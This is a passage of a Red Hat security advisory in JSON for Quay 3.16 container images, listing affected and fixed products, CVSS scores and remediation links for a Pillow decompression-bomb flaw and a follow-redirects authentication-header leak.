        }
      ],
      "release_date": "2026-04-15T22:53:56.147000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "Pillow: Pillow: Denial of Service via decompression bomb in FITS image processing"
    },
    {
      "cve": "CVE-2026-40895",
      "cwe": {
        "id": "CWE-212",
        "name": "Improper Removal of Sensitive Information Before Storage or Transfer"
      },
      "discovery_date": "2026-04-21T21:02:33.280553+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2460297"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in follow-redirects. When an HTTP request follows a cross-domain redirect (a redirection to a different domain), custom authentication headers, such as X-API-Key or X-Auth-Token, are not properly stripped. This allows these sensitive headers to be forwarded verbatim to the redirect target, potentially leading to the unintended disclosure of authentication information to an untrusted third party.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "follow-redirects: follow-redirects: Information disclosure via cross-domain redirects",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-40895"
        },
        {
          "category": "external",
          "summary": "RHBZ#2460297",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460297"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-40895",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40895"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40895",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40895"
        },
        {
          "category": "external",
          "summary": "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653",
          "url": "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653"
        }
      ],
      "release_date": "2026-04-21T19:59:59.759000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "follow-redirects: follow-redirects: Information disclosure via cross-domain redirects"
    },
    {
      "cve": "CVE-2026-42033",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T18:01:20.937507+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461607"
        }
      ],
      "notes": [
        {
